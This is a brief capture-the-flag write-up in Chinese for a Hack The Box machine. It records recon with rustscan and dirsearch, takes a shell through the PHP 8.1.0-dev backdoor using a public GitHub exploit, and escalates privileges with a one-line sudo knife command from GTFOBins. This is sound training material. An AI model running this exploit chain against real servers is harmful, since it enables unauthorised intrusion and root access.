URL : https://app.hackthebox.eu/machines/347

IP : 10.10.69.238

Recon

• 掃 Port
  • rustscan -a 10.10.69.238 -r 1-65535
    • 
    • 有開 80 跟 443
• 觀察 Wappalyzer
  • 
    • Apache 2.4.41
    • PHP8.1.0
  • 
• 掃目錄
  • python3 dirsearch.py -u http://10.10.10.242/
  • 看起來沒有東西 QQ
    • 

Exploit

• 找到 php 8.1.0 有 RCE 漏洞
  • https://github.com/flast101/php-8.1.0-dev-backdoor-rce
  • git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce
• 執行起來
  • 
  • 就成功拿到 Shell ㄌ
• 也可以執行另外一個 reverse shell 版本
  • 
  • 
• 取得 user.txt
  • 

提權

• 起手式 sudo -l
  • 
  • 發現我們可以用 sudo knife
• GTFOBins 尋找刀子的 sudo 提權
  • sudo knife exec -E 'exec "/bin/sh"'
  • 就提權成功ㄌ
  • 
• 取得 Root Flag
  • 

心得

這題提醒我們，還是需要優先確認各種服務的版本號。